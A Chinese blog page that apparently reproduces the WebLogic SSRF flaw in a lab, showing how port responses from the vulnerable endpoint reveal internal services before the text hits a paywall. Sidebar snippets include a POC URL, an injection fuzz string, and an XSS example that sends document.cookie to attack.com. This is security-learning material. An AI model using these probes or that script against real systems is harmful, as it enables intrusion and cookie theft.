Weblogic-SSRF漏洞复现

最新推荐文章于 2023-11-17 21:10:00 发布
VIP文章 最新推荐文章于 2023-11-17 21:10:00 发布
阅读量460 收藏 1
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wodepzw/article/details/103496530
版权

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp

我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:7001

我们访问的IP是内网ip地址,一般是拒绝访问的
在这里插入图片描述
当我们访问一个不存在的端口时,比如 http://127.0.0.1:7000

将会返回:could not connect over HTTP to server
在这里插入图片描述
当我们访问存在的端口时,比如 http://127.0.0.1:7001

可访问的端口将会得到错误,一般是返回status code(如下图),如果访问的非http协议,则会返回:did not have a valid SOAP content-type

最低0.47元/天 解锁文章
wodepzw
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
weblogic CVE-2018-3191 exp(含weblogic-spring-jndi-10.3.6.0.jar)
07-05
自用CVE-2018-3191 weblogic反序列化exp。
s>/<s>.css?12345‘“\‘\“);|]*%00{%0d%0a<%00>%bf%2项目检测问题Application error message
Crazy的博客
08-25 2068
问题描述:Application error message Acunetix Security Audit 使用工具扫描项目时扫描出来的问题 Web Server Details Path Fragment input /[*]/<s>/<s>-<n>.<n>/<s>/<s>/<s>.css was set to 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 Pat
漏洞复现Weblogic SSRF漏洞复现
Miraitowax
02-22 856
Weblogic SSRF的漏洞原理,漏洞复现步骤详细总结及剖析
CRLF注入(HTTP响应拆分-截断)
m0_51468027的博客
03-27 3414
2023年HW厂商斗象面试题——CRLF注入
我眼中的Weblogic-SSRF
ovowovo的博客
12-10 761
一、ssrf简述: SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,一般情况下,ssrf攻击的目标是从外网无法访问的内部系统(正是因为他是有服务器端发起的,所以他能够请求到与他相连而与外网隔离的内部系统) 影响版本:10.0.2.0 10.3.6.0 SSRF危害以及可实现的攻击行为 主...
Weblogic SSRF漏洞复现
weixin_51151498的博客
11-30 829
Weblogic SSRF漏洞复现
【vulhub】weblogic ssrf漏洞复现
weixin_53730939的博客
03-19 460
【vulhub】weblogic ssrf漏洞复现(详解)
SSRF漏洞简析
qq_42383069的博客
12-03 934
SSRF漏洞简析1.漏洞介绍2.漏洞成因3.漏洞流程梳理4.简要总结5.在centos下测试6.利用方式7.常见的防御方法8.ssrf常发生的位置 1.漏洞介绍 SSRF服务器端请求伪造漏洞: 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF访问的是目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人) 2.漏洞成因 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。
Weblogic SSRF漏洞
热门推荐
chaojixiaojingang
01-14 1万+
1.漏洞描述 weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 2.影响版本 weblogic 10.0.2 – 10.3.6版本 3.POC http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSear...
仔细扒一些网络攻击
yuanfangyoushan的博客
09-24 296
XSS 反射型 含义: 反射型 XSS 攻击的恶意脚本并没有被存储到后端数据库中,而是诱导用户点击某个精心拼接的恶意链接,从而达到攻击的目的。 例子: 假如正常请求地址是:https://xxx.com/list?search=搜索什么东西,而攻击者拼接了一个恶意的链接:https://xxx.com/list?search=搜索什么东西<script>fetch(`https://attack.com?cookie=${document.cookie}`)</script> 这时候
图解HTTP----web的攻击技术
xuan的博客
08-16 460
一、概述 互联网上的攻击大都将Web站点作为目标。 二、针对Web的攻击技术 (1)简单的HTTP协议本身并不存在安全性问题,因此协议本身几乎不会成为攻击对象。 (2)应用HTTP协议的服务器和客户端,以及运行在服务器上的Web应用等资源才是攻击目标。 (3)HTTP 不具备必要的安全功能 几乎现今所有的 Web 网站都会使用会话(session)管理、加密处理等安全性方面的功能,...
[Vulhub] Weblogic SSRF 漏洞(CVE-2014-4210)
weixin_45605352的博客
07-21 4909
0x00 预备知识 01 SSRF概念: SSRF(服务端请求伪造),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 简单的说就是利用一个可发起网络请求的服务当作跳板来攻击其他服务 02 SSRF原理 SSRF的实质是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。一般情况下, SSRF攻击的目标是外网无法访问的内部系统,黑客可以利用SSRF漏洞获取内部系统的一些信息(正是因为它是由服务端
java基础及注意点
wu1039321317的专栏
10-06 903
第三章   对象 名词     对象:     类:  一类属性相同的对象     属性:是什么样     方法:能做什么(C 中叫作函数) 对象:     声明:Student s ;         这时我们只是说明s是一个能够指向Student类型的引用(相当于C++中的指针),并没有创建一个对象。         所以我们此时不能对s做任何操作。     初始化
SSRC】Weblogic SSRF漏洞
wj33333的博客
11-17 258
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。WeblogicSSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入。首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),可访问的端口将会得到错误,一般是返回status code(如下图)。
node-v18.18.2-headers.tar.xz
最新发布
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
复现weblogic漏洞ssrf
08-15
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值